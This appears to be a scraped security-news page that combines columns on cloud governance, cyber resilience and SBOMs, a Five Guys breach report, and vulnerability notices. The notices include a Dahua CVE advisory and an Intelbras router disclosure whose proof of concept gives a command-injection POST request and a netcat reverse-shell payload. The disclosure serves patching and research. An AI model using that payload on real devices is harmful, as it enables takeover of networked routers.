CISOs' top cloud challenge is harmonizing standards, policies, and procedures across blended environments.

In Coalfire's "2023 State of CISO Influence" report, developed in partnership with Dark Reading — security executives in major industries and companies of all sizes called out _lack of good governance strategy_ as one of the top challenges they face in managing cloud migration.

With any move to the cloud, corporate leaders focus intently on leveraging capabilities and harnessing myriad services, with IT often juggling the management of multiple assets in a hybrid environment. CISOs want to take the existing security program and wrap it around newly migrated systems to keep people, processes, and policies as consistent as possible and avoid the need to invent anything new. Updating and unifying standards and procedures usually lands last on the list.

While no single governance model is the right answer for all organizations, governance in the cloud age must, at a minimum, establish oversight, strategy, and enforcement of standards to ensure alignment of operational practices to the objectives and risk tolerance of the organization.

Security governance bridges business priorities with technical implementation like architecture, standards, and policy.

For smaller companies especially, the governance function is sometimes overlooked until it's too late. C-level security executives at firms with 500 or fewer employees ranked governance problems 10 points ahead of their midsize and larger enterprise counterparts.

**Optimizing Governance to Bolster Brand Confidence**

The report confirmed what I believe to be the essence of business resilience today: setting priorities, communicating effective incident response strategy, preplanning continuity of systems, and assuring continuous compliance.

Business goals and risk management are the best security program guideposts, ensuring that efforts are optimized to focus on the organization's top areas of concern. So naturally, it's becoming mission-critical to optimize governance processes to work effectively in today's hybrid server environments. Increasing infrastructure complexity drives hard questions, such as:

*   _How do we absorb the operational risk introduced by third parties within our cloud-based ecosystem?_
*   _How do we configure and uniformly apply access policies for employees, customers, vendors, remote workers, IoT, etc.?_
*   _Can we achieve zero trust, and can it be retrofitted to effectively fit into a hybrid environment?_
*   _What's our strategy and execution plan to enable operational resilience with pervasive incident detection and response?_
*   _How do we assure customers and stakeholders of our business's ability to continue operations after a disruption or during a mitigation?_

Addressing these questions facilitates a rational, cost-efficient approach instead of the outdated "sky is falling/spend more" mentality that has proven to be unsustainable. With the ever-expanding attack surface of the hyperscale cloud, CISOs can't eliminate risk, nor can they justify impulsive spending on endless identification of threats and scanning for vulnerabilities. Instead, they must respond and remediate problems, reduce costs, and enhance secure product life cycles to bolster brand reputation and customer confidence.

**Align Governance Responsibilities to Avoid Conflict**

Our research reflects that service delivery across industries is moving further into the cloud every year. Though all on-premises systems are eventually considered candidates for transition, legacy systems aren't going away tomorrow, so we need a pragmatic management style to keep the cloud momentum going while dealing with an expanding attack surface — the other "top two" concern of CISOs in the survey along with lack of good governance.

When developing governance strategies for hybrid cloud operations, it's critical that CISOs understand what services are provided by cloud and SaaS vendors, and that they have clarity on where the responsibilities and liabilities fall. While security professionals are more effectively closing known gaps, security teams still feel most of the heat when there are problems. Cloud vs. on-premises staff may fall into an adversarial pattern that results in attempts to deflect responsibility or engage in finger-pointing.

A well-planned governance model that assigns roles and responsibilities through a RACI responsibility alignment matrix is one of the best ways to avoid these situations. Failure to develop those plans up front can exacerbate the impact of even minor conflicts. Forward-thinking security leaders road map what needs to be done and who's going to do what, well ahead of time. At the onset of any migration or lift-and-shift, savvy CISOs need to start with a clear understanding of "who's on first." Prioritize that forethought by shifting core governance functions to the far-left side of the project management planning matrix.

Great CISOs don't just implement security measures, they build trust by working with business leadership to apply essential governance disciplines that align business strategy, risk management, asset protection, and innovation security while providing guidance to drive execution of security best practices and controls.

Across the board, CISOs in every sector and company size say governance is too often an afterthought. Lack of strategy produces hazards such as potential breach, disruption, and policy failures, as well as interdepartmental friction between cloud and on-prem teams. Whether it's a risk steering committee or a Cloud Advisory Board, good governance keeps the business moving and the supply chain flowing. It's a core competency for all security leaders.

**About the Author**

    

Michael Eisenberg is a seasoned information security professional with more than 31 years of experience working across public and private sectors, including two global Fortune 250 organizations (Aon and McDonald's Corporation), the government sector and the U.S. military. As vice president of Strategy, Privacy, and Risk at Coalfire, Michael leverages his experience through a range of security consultative services that help C-level officers build and improve security strategies and deliver cybersecurity programs. He received a master's degree in computer science from Illinois Institute of Technology. Michael holds CISSP, CISA, CISM, and CRISC security certifications.

Governance in the Cloud Shifts Left

Shift your mindset from risk to resilience.

As the lyrics of "Auld Lang Syne" so eloquently say, "Should old acquaintance be forgot and never brought to mind?" As security leaders look forward to what the new year brings, they're taking stock of everything — their teams, their technologies, their budgets — and trying to plan for what looks to be another challenging year.

While I don't have a Magic 8 Ball, 2023 looks like more of the same — the same budget constraints, the same supply chain problems, and the same cybersecurity challenges. There is also a lot of pressure currently on security leaders to do more with less while also facing more scrutiny and more accountability for the effectiveness of their cybersecurity programs. Sophisticated and frequent cyberattacks, shrinking budgets, and a scattered workforce have only exacerbated preexisting security challenges to the point that it's hard to know what to address first. So, if you're a security leader still working on your New Year's resolutions, cyber resilience should be No. 1 on your list.

**Shifting Your Mindset****

Most security leaders today have adopted "it's not if, but when" mindset in relation to cybersecurity incidents. Additionally, risk management — constantly identifying risk and implementing the appropriate mitigating controls — continues to be a key component of overall cybersecurity program management. But what if you're unable to implement the necessary controls or if you fail to identify a critical risk? The real question is, what is your plan for readiness when you're faced with a risk that has been realized due to having no mitigating controls, inadequate mitigating controls, or blind spots?

Recently, I met with a potential customer, and security staffers outlined their current cybersecurity challenges, program/technology wants and needs, and talent shortages. As they described their top cybersecurity concerns, I asked if they were thinking about their problems correctly; instead of focusing on problem X, perhaps they should focus on problem Y instead. But then I realized that the security leader at that company sees the same problems day in and day out, and they're specific to the organization. In contrast, however, being in a role similar to that of a security solutions consultant, I see many different types of problems being approached and solved in multiple ways.

I wondered how much this difference in perspective affects our ability as an industry to align on cybersecurity baselines, metrics, prioritization approaches, etc. It's difficult to solve problems within our cybersecurity programs when the problems, the organizations we protect, and our priorities change every day. If we agree that "it's not if, but when," we also agree that we must accept a degree of uncertainty when managing our security. We cannot, however, allow those blind spots to result in business disruption. Instead, there must be a mindset shift in the way cybersecurity programs are managed, from a traditional risk management model to cyber resilience.

****Understanding the Security Game****

The good news is we're starting to see a shift in organizations prioritizing resilienc and not just risk, even though effective risk management is an important component of cyber resilience. According to a recent Forrester report, there has been a significant increase in chief risk officers (CROs) reporting directly to the CEO. This is one example of a much-needed pivot in the enterprise mindset, with security evolving from a compliance checkbox to an investment in a strategy for cyber resilience. For companies with inadequate protections in place, CISOs will need to focus their budgets on having a resourced team, proper tools, and robust training.

Part of this mindset shift is also understanding the security game you need to play and then being able to explain that strategy to your leadership team and board of directors. When all you think about is the risk — we're risky here, so we'll plug this hole with this solution, then we're risky over here, so we'll plug that hole over there with this other solution — it's like playing a game of whack-a-mole. Try taking that approach to your board as a well-defined strategy.

Instead, the message needs to be something along the lines of: According to industry research in our vertical, here are the top threats that attackers can leverage in our type of environment, and here's how we can improve our environment. Our strategy is to be more resilient.

Now you have something measurable and can build a reasonable cybersecurity program road map.

****Why Cyber Resilience Should Be No. 1 on Your To-Do List****

The CISOs who will be most effective in 2023 will not look to answer the question "Are we safe?" Because the answer is always no — there will always be risk. The right question is "How ready are we?" You want to think about what you learned from that cyber incident — which is more than just reactively identifying the risk, assessing costs, and then implementing controls accordingly. Guess what? Attackers also have those controls. And by the time you go through your procurement process, proof of value, vendor selection, and solution implementation, attackers are several steps ahead of you.

There will always be gaps in what you know about your environment, so focusing on the continuous improvement of your security program through the lens of being ready to anticipate, withstand, recover, and adapt is how you should approach 2023.

Now is the time for security leaders to create a cyber resilience-focused program. Companies can't eliminate all risk, but we will see organizations putting in place full-scale plans and spending where they need to so they are prepared to measure progress and improvement in their cybersecurity program. Those organizations that go with the "good enough" approach will most likely pay the price (and more) later.

**

The Resolution Every CSO/CISO Should Make This Year

It's imperative we collaborate and partner to improve software security. This may require developing tools and standards that can enrich SBOMs and provide deeper analysis.

Many in our industry are weighing the benefits that software bills of materials (SBOMs) could possibly bring to software quality and security. I think SBOMs are needed to understand and assess risk in software because they should provide visibility into the software construction process for a given software system. At some level, SBOMs already exist for certain products and software systems; however, their application for evaluating quality and security as stipulated in Executive Order 14028, Improving the Nation's Cybersecurity and recent federal guidance by the US Office of Management and Budget, the National Institute of Standards and Technology, and the Cybersecurity Infrastructure and Security Agency is fairly new and unproven at scale.

**The Royce Bill That Never Passed****

Around 2013, SBOM legislation H.R.5793 – Cyber Supply Chain Management and Transparency Act (known as the Royce Bill) was introduced but never gained the momentum it needed to pass as a mandate, bill, or requirement. The industry did not then have the appetite for transparency to manage software supply chain risk.

The issues this legislation would have addressed are outlined in the Congressional Record – Extensions of Remarks. These issues have now been exacerbated given the overwhelming amount of complexity and growing size in modern software development, and the increasing rate of attacks against open source software. With the increasing consumption rate of open source software in modern software development, consumers must be aware of the technical debt in open source software projects that has accumulated over time to better manage software risk. The idea of more software complexity, larger software systems, and mounting technical debt does not bode well for the federal government's desire for software integrity and trustworthiness through the software supply chain.

The fact that the Royce Bill didn't pass can be seen as a missed opportunity to address the growing threats and risk in software security at the time. Almost a decade later, the industry is still struggling to figure out how to implement SBOMs and strike the right balance to make them useful and not a target for adversaries to exploit. This raises major concern in industry about whether SBOMs are ready for prime time given the skepticism regarding the current requirements outlined in federal guidance.

****SBOM Must Inform About Unknown Risk****

One of the challenges for SBOMs is advancing and understanding how risky software is determined. I use the term "risky" because all software has vulnerabilities, and the SBOM must be able to differentiate or provide context to the level of risk associated with a software component, whether in isolation or once it has been implemented and integrated into a software system. To simply say you can't use this software component because it has CVEs (common vulnerabilities and exposures) associated with it becomes moot because all software can have vulnerabilities. SBOMs must be able to succinctly qualify which CVEs are the most dangerous and exploitable given the context the software will be implemented and used — the component function (logging, encryption, access control, authorization), the environment, and whether it can be hardened to reduce a given attack surface. The way in which software components are integrated into a system matters because software components can be implemented poorly or incorrectly, exposing vulnerabilities in software systems.

Using CVEs to establish a security baseline for open source software consumption make sense; however, tallying a bunch of CVEs to determine what software is less risky or riskier only focuses on the "known knowns" (as shown in the figure below) and does very little to help organizations understand what weaknesses are lurking that may expose vulnerabilities and impact the overall hygiene of that software component (over a period of time). Furthermore, the current state of practice regarding SBOMs doesn't encourage software supply chainers to understand the defect proneness or attack proneness rates associated with software. This is important because some software components are highly targeted and require significant patching due to inherent technical debt, low code quality, and security issues that expose vulnerabilities. More patching means developers and engineering teams are spending less time on creating and delivering new features and functionality to customers.

Defect proneness refers to the likelihood that a software component will be defective after a software product is released. There are various socio-technical factors that contribute to defect proneness such as low code quality and design flaws. Attack proneness refers to the rate at which software components can be successfully exploited, or the likelihood that software components will contain exploitable weaknesses — bug, defect, or flaw — or vulnerabilities.

    

Source: Kevin Greene

SBOM solutions must give organizations visibility into potential risk for a given software component as shown in the figure above, helping organizations make informed decisions about which software components to use and which software components to avoid. For instance, advice in the National Security Agency (NSA) Cybersecurity Information Sheet encourages developers to avoid using software developed in C and C++ because those programming languages were not intended to enforce good memory management checks. It will be interesting to see how this advice will affect the software supply chain, mainly for embedded safety critical systems, and whether suppliers will turn to programming languages that are memory safe, such as Rust and Go.

****Go Deeper to Guide SBOM****

SBOMs are not going away, so it's imperative we all collaborate and partner to improve software security. This may require developing tools and standards that can enrich SBOMs and provide deeper analysis and insight about the characteristics of software that help inform about software risk. This will help organizations effectively evaluate and attest to software integrity, as well as other software assurance properties. Ultimately, it's important for software supply chainers to understand not just the risk associated with a given software component but the potential maintenance associated with using that software component over a period of time, given the challenges in industry to remediate vulnerabilities in software in a timely fashion. The use of defect and attack proneness rates could provide actionable intelligence that helps lower the consumption of risky software with poor hygiene, and guide software supply chainers in building software systems that are more resilient to cyberattacks. 

In theory, software components with high defect and attack proneness rates should be avoided to help stimulate and encourage the use of alternatives with better hygiene. In my opinion, SBOMs don't improve code quality and security directly, but they can make software supply chainers more aware of risk in their software construction process. Improving code quality and security for open source software requires a culture shift given that having many eyes does not make all bugs shallow.

**

Don't Be Blindsided by Software Bills of Materials

Job applicants could face a raft of follow-on attacks after cyber intruders accessed their data in an opportunistic attack.

The Five Guys burger empire has been hit with what appears to be a "smash-and-grab" operation: Cyberattackers busted into a file server and made off with the personally identifiable information (PII) of people who applied to work at the chain.

Details are scant, but in a form letter to the impacted sent out on Dec. 29, Five Guys chief operating officer Sam Chamberlain noted that an "unauthorized access to files" was discovered on Sept. 17 and was blocked the same day.

He added, "We conducted a careful review of those files and, on December 8, 2022, determined that the files contained information submitted to us in connection with the employment process, including your name and \[variable data\]."

What was that "variable data," one might ask? Turke & Strauss LLP, a law firm that's investigating the matter on behalf of the victims, identifies the information as including Social Security numbers and drivers' license data.

Five Guys did not immediately respond to a request for verification or comment from Dark Reading.

Five Guys employs about 5,000 people worldwide, according to Forbes, and presumably the turnover and number of applications for open positions is similar to other food-service jobs. But while that means that a large number of people could potentially be affected by the breach, the company has so far left it unclear how many people were actually caught up in the incident.

Five Guys also hasn't announced what, if any, shoring up of security it plans to do in the wake of the incident, only noting that it engaged law enforcement and a cybersecurity firm, and that it would provide credit monitoring. Brad Hong, customer success manager at Horizon3ai, notes that improvements to defense should be an important part of the incident response.

"An unfortunate precedent has been set \[by the infamous Equifax breach\] to simply provide credit monitoring, shifting the onus of action back to the consumer instead of the organization announcing the technological steps taken to prevent breaches in the future," he says.

**A Whole Menu of Follow-on Attacks**

Researchers note that the unfolding situation could prove difficult for both the individual victims and the burger purveyor itself. This isn't Five Guys' first time being flamed on the cybercrime grill, as BullWall executive vice president Steve Hahn notes — and a prior incident illustrates just what could be at stake for both.

"In a past breach of Five Guys, the threat actor used the stolen data to make fraudulent charges on bank debit and credit cards, and one such bank, Trustco, was hit with $100,000 in fraudulent charges from customers of theirs that have been part of this data breach," he tells Dark Reading. "If the bad guys got that much out of Trustco, imagine how much they've bilked from Chase or Bank of America.”

As for the impact to the company, Trustco went on to file a lawsuit against Five Guys in New York for damages related to issuing new cards and reimbursing victims for fraudulent charges.

In this more recent case, John Bambenek, principal threat hunter at Netenrich, notes that there are any number of follow-on attacks that threat actors could mount using the data, even if it doesn't include payment-card information.

"The most immediate use of this data is to realize there are a handful of people on the lower end of the economic scale who are looking for jobs," he says. "I imagine there will be scams and mule recruitment lures sent to those people in the near future."

Hahn meanwhile mentions that the craftier cybercriminal types will often also try to take advantage of the fear and reaction in the market when such an incident is publicized, in the form of ultra-believable phishing efforts.

"Victims may get an email: 'We apologize but as you may have heard your data was part of our data breach,'" he explains. "'Please click here to reset your password.' These emails can look identical to emails from Five Guys and they can even spoof the Five Guys domain. Once the user puts in their credentials, they threat actor now has access to all the other sites they use that password on, like PayPal, Amazon, or Venmo."

Jim Morris, chief security adviser at Tanium, also tells Dark Reading that the potential for a cybercrime ripple effect could also include extortion, affecting applicants and organizations alike.

"Any victimized organization could receive double extortion threats — i.e., ask for money to not leak or sell the data," he says. "Individuals whose information is contained in the breach could be victims of triple extortion, whereby the attackers demand money from them to in turn not sell or use their data."

**A Smash (& Grab) Burger of Data Theft**

Since the data breach notice indicates that the bad guys accessed a single file server, with no lateral movement, this is likely a case of financially motivated attackers looking for low-hanging fruit, researchers say — and finding it.

Restaurants and food-service outlets have a unique set of financial challenges (like razor-thin margins) that can often lead to them deprioritizing security, even as they collect reams of data via online ordering, reservations systems, HR systems, and more, on an order of magnitude that far outstrips other sectors, says Andrew Barratt, vice president at Coalfire.

"The challenge is real — we have adaptive threat actors who will chase down any point of access versus defenders with limited budgets and a whole raft of macro-economic stresses to focus in on too," he says. "Really, we need to keep visibility of these kind of compromises high so that executives don't discount them as 'won’t happen to me.'"

Others are less charitable. Horizon3ai's Hong adds, "Unless the attack vector in this incident was a novel one, all signs point to this incident being another example of a company that chose returns over security. With Five Guys pulling in close to $2 billion in revenue, I’d be interested to see what their cybersecurity spend was."

Meanwhile, Web-facing systems could exacerbate the risk, Casey Ellis, founder and CTO at Bugcrowd, says.

"This sounds a lot like a recruiting system where candidates upload their resumes," he tells Dark Reading. "Having these sorts of systems available to the Internet makes sense when you consider the recruiting and job application process, but if something is more available to a public user, it's also more available to a potential attacker."

He adds, "Common Web coding flaws like Indirect Object References (IDOR), authentication flaws, and even injection flaws can enable this type of attacker outcome without the need for lateral movement."

Indeed, Tanium's Morris notes that the most common break-in approaches by threat actors looking for easy pickings tend to be the exploitation of known vulnerabilities, and phishing and stolen credentials. As such, there are simple steps that could make bottom-feeding data thieves simply move on to an easier target.

"Organizations can combat these attacks by having robust life-cycle management of all computer hardware and software. This requires identifying critical assets and data and protecting them accordingly," he says. "Asset life-cycle management must also include sustainable and efficient vulnerability and patching programs. Additionally, strong authentication and authorization processes that includes multifactor authentication need to be employed."

Five Guys Data Breach Puts HR Data Under a Heat Lamp

Linux suffers from two seccomp bugs with a PT_SUSPEND_SECCOMP permission bypass and ptracer death race condition.

Linux PT_SUSPEND_SECCOMP Permission Bypass / Ptracer Death Race

StreamX applications from versions 6.02.01 to 6.04.34 are affected by a logic bug that allows to bypass the implemented authentication scheme. StreamX applications using StreamView HTML component with the public web server feature activated are affected.

CVE-2022-4779: StreamX release notes - Elvexys SA

Improper path santiziation in github.com/goadesign/goa before v3.0.9, v2.0.10, or v1.4.3 allow remote attackers to read files outside of the intended directory.

@@ -372,6 +372,10 @@ func (ctrl \*Controller) FileHandler(path, filename string) Handler { } } return func(ctx context.Context, rw http.ResponseWriter, req \*http.Request) error { // prevent path traversal if attemptsPathTraversal(req.URL.Path, path) { return ErrNotFound(req.URL.Path) } fname := filename if len(wc) \> 0 { if m, ok := ContextRequest(ctx).Params\[wc\]; ok { @@ -415,6 +419,32 @@ func (ctrl \*Controller) FileHandler(path, filename string) Handler { } }  
func attemptsPathTraversal(req string, path string) bool { if !strings.Contains(req, "..") { return false }  
currentPathIdx := 0 if idx := strings.LastIndex(path, "/\*"); idx \> \-1 && idx < len(path)\-1 { req \= req\[idx+1:\] } for \_, runeValue := range strings.FieldsFunc(req, isSlashRune) { if runeValue \== ".." { currentPathIdx\-- if currentPathIdx < 0 { return true } } else { currentPathIdx++ } } return false }  
func isSlashRune(r rune) bool { return os.IsPathSeparator(uint8(r)) }  
var replacer \= strings.NewReplacer( "&", "&amp;", "<", "&lt;",

CVE-2019-25073: v1: Prevent directory path traversal in FileHandler (#2388) · goadesign/goa@70b5a19

Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.

**Advisory ID****：**DHCC-SA-202212-001

**First Published****：**2022-12-20

Cybersecurity is an on-going challenge for all IoT connected device manufacturers and users, as it is for all digital products and services. Dahua Technology is committed to developing and maintaining state-of-the-art cybersecurity practices, including through our product design process and our customer-facing Dahua Cybersecurity Center (DHCC) for transparent vulnerability reporting and handling.

In response to security issues reported by Bashis from IPVM, Dahua immediately conducted a comprehensive investigation of affected product models and has developed patches and firmware that fix the vulnerabilities. Please download from https://software.dahuasecurity.com/en/download or contact Dahua local technical support to upgrade.

We strongly suggest, consistent with cybersecurity best practice, that all Dahua customers follow our security advisory, in order to ensure their systems are up-to-date and maximally protected. In the meantime, customers with other concerns on cybersecurity related issues, please feel free to contact us at cybersecurity@dahuatech.com.

**Summary**

1.    CVE-2022- 45423

Some Dahua software products have a vulnerability of unauthenticated request of MQTT credentials. An attacker can obtain encrypted MQTT credentials by sending a specially crafted packet to the vulnerable interface (the credentials cannot be directly exploited).

2.    CVE-2022- 45424

Some Dahua software products have a vulnerability of unauthenticated request of AES crypto key. An attacker can obtain the AES crypto key by sending a specially crafted packet to the vulnerable interface.

3.    CVE-2022- 45425

Some Dahua software products have a vulnerability of using of hard-coded cryptographic key. An attacker can obtain the AES crypto key by exploiting this vulnerability.

4.    CVE-2022- 45426

Some Dahua software products have a vulnerability of unrestricted download of file. After obtaining the permissions of ordinary users, by sending a specially crafted packet to the vulnerable interface, an attacker can download arbitrary files.

5.    CVE-2022- 45427

Some Dahua software products have a vulnerability of unrestricted upload of file. After obtaining the permissions of administrators, by sending a specially crafted packet to the vulnerable interface, an attacker can upload arbitrary files.

6.    CVE-2022- 45428

Some Dahua software products have a vulnerability of sensitive information leakage. After obtaining the permissions of administrators, by sending a specially crafted packet to the vulnerable interface, an attacker can obtain the debugging information.

7.    CVE-2022- 45429

Some Dahua software products have a vulnerability of server-side request forgery (SSRF). An Attacker can access internal resources by concatenating links (URL) that conform to specially rules.

8.    CVE-2022- 45430

Some Dahua software products have a vulnerability of unauthenticated enable or disable SSHD service. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could enable or disable the SSHD service.

Note: This vulnerability affects Linux based system only.

9.    CVE-2022- 45431

Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server.

Note: This vulnerability affects Linux based system only.

10.   CVE-2022- 45432

Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server.

Note: This vulnerability affects Windows based system only.

11.   CVE-2022- 45433

Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could get the traceroute results.

Note: This vulnerability affects Windows based system only.

12.   CVE-2022- 45434

Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.

Note: This vulnerability affects Windows based system only.

**Vulnerability Score**

The vulnerability classification has been performed by using the CVSSv3.1 scoring system (http://www.first.org/cvss/speciallyation-document).

CVE-2022-45423

Base Score: 5.3(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Temporal Score: 4.8(E:P/RL:O/RC:C)

CVE-2022-45424

Base Score: 7.5(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Temporal Score: 6.7(E:P/RL:O/RC:C)

CVE-2022-45425

Base Score: 7.5(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Temporal Score: 6.7(E:P/RL:O/RC:C)

CVE-2022-45426

Base Score: 7.7(AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Temporal Score: 6.9(E:P/RL:O/RC:C)

CVE-2022-45427

Base Score: 8.7(AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H)

Temporal Score: 7.8(E:P/RL:O/RC:C)

CVE-2022-45428

Base Score: 4.9(AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

Temporal Score: 4.4(E:P/RL:O/RC:C)

CVE-2022-45429

Base Score: 9.8(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Temporal Score: 8.8(E:P/RL:O/RC:C)

CVE-2022-45430

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L)

Temporal Score: 5.2(E:P/RL:O/RC:C)

CVE-2022-45431

Base Score: 8.6(AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)

Temporal Score: 7.7(E:P/RL:O/RC:C)

CVE-2022-45432

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)

Temporal Score: 5.2(E:P/RL:O/RC:C)

CVE-2022-45433

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)

Temporal Score: 5.2(E:P/RL:O/RC:C)

CVE-2022-45434

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L)

Temporal Score: 5.2(E:P/RL:O/RC:C)

**Affected Products & Fix Software**

The following product series and models are currently known to be affected.

Affected Model

Affected Version

Fix Software

Affected Area

DSS Professional

V7.002.1760000.2

Patch Installer for DSS Professional V7

Overseas

V8.0.2

Patch Installer for DSS Professional V8.0.2

V8.0.4

Patch Installer for DSS Professional V8.0.4

V8.1

Patch Installer for DSS Professional V8.1

V8.1.1

Patch Installer for DSS Professional V8.1.1

DSS Express

V1.000.175J000.2

Patch Installer for DSS Express V7

Overseas

V8.0.2

Patch Installer for DSS Express V8.0.2

V8.0.4

Patch Installer for DSS Express V8.0.4

V8.1

Patch Installer for DSS Express V8.1

V8.1.1

Patch Installer for DSS Express V8.1.1

DHI-DSS7016D-S2/DHI-DSS7016DR-S2

V1.001.0000001.2

Patch Install for DSS7016D/R-S2 V7

Overseas

V8.0.2

Patch Installer for DSS7016D/DR-S2 V8.0.2

V8.0.4

Patch Installer for DSS7016D/DR-S2 V8.0.4

V8.1

DSS7016D/DR-S2 V8.1

DHI-DSS4004-S2

V1.001.0000000.2

Patch Install for DSS4004-S2 V7

Overseas

V8.0.2

Patch Installer for DSS4004-S2 V8.0.2

V8.0.4

Patch Installer for DSS4004-S2 V8.0.4

V8.1

DSS4004-S2 V8.1

Note: To view the version, please log in to the Web and view it on the “About” page.

**Fix Software Download**

Please download the corresponding fix software or its newer version as listed in the above table from Dahua website, or contact Dahua local technical support to upgrade.

• Dahua Official website: https://software.dahuasecurity.com/en/download

• Dahua Technical Support Personnel.

**Support Resources**

For any questions or concerns related to our products and solutions, please contact Dahua DHCC at cybersecurity@dahuatech.com.

**Acknowledgment**

We acknowledge the support of Bashis from IPVM who discovered these vulnerabilities and reported them to DHCC.

**Revision History**

Version

Description

Date

V1.0

Initial public release

2022-12-20

CVE-2022-45434: Security Advisory – Vulnerabilities found in Dahua software products

Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.

**Full Disclosure mailing list archives****Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh**

_From_: Thomas Weber <t.weber () cyberdanube com>  
_Date_: Tue, 13 Dec 2022 17:59:41 +0100  

CyberDanube Security Research 20221009-0

\-------------------------------------------------------------------------------

               title| Authenticated Command Injection
             product| Intelbras WiFiber 120AC inMesh
  vulnerable version| 1.1-220216
       fixed version| 1-1-220826
          CVE number| CVE-2022-40005
              impact| High
            homepage| https://www.intelbras.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com

\-------------------------------------------------------------------------------

Vendor description

\-------------------------------------------------------------------------------

"We are Intelbras. A company that for 45 years has been offering innovative

solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an

INspiration and a promising idea: to manufacture PABX centrals. During the

80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s

were marked by the consolidation of the company in the telecommunications

segment and we became leaders in the PABX and telephone terminals segment. The

turn of the millennium represented the search for greater connection and

proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing

units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.

We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our

DNA, increasingly present in our daily lives. And it was only possible to

write a story so full of achievements because employees, partners and customers

were close and believed in us."

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

\-------------------------------------------------------------------------------

WiFiber 120AC inMesh / 1.1-220216


Vulnerability overview

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)

The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can

be done by an attacker.


Proof of Concept

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)
The web server is prone to an authenticated command injection via POST
parameters. The following proof-of-concept shows how to inject the command
"ls /" to the system which gets executed in the background:

\===============================================================================

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

\===============================================================================

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution

\-------------------------------------------------------------------------------

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip

Workaround

\-------------------------------------------------------------------------------

None


